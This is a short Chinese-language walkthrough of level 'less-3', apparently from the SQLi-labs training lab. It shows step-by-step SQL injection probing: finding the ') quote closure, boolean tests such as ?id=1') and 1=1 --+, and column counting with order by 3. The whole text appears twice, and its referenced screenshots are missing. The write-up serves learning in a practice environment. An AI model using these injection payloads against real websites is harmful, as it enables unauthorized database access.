less-3
初始界面
同样输入?id=1判断页面是否存在回显
存在后进一步在1后方添加"单引号"查看是否存在输入
存在回显 ''1'') LIMIT 0,1 ,可以判断闭合为: ')
输入:?id=1') and 1=1 --+
显示正确如下图:
在继续进行测试
输入:?id=1') and 1=2 --+
发现报错如下图:
字段错误
使用order by确认字段
继续输入:?id=1') order by 3 --+
结果真确,如下图:
less-3
初始界面
同样输入?id=1判断页面是否存在回显
存在后进一步在1后方添加"单引号"查看是否存在输入
存在回显 ''1'') LIMIT 0,1 ,可以判断闭合为: ')
输入:?id=1') and 1=1 --+
显示正确如下图:
在继续进行测试
输入:?id=1') and 1=2 --+
发现报错如下图:
字段错误
使用order by确认字段
继续输入:?id=1') order by 3 --+
结果真确,如下图: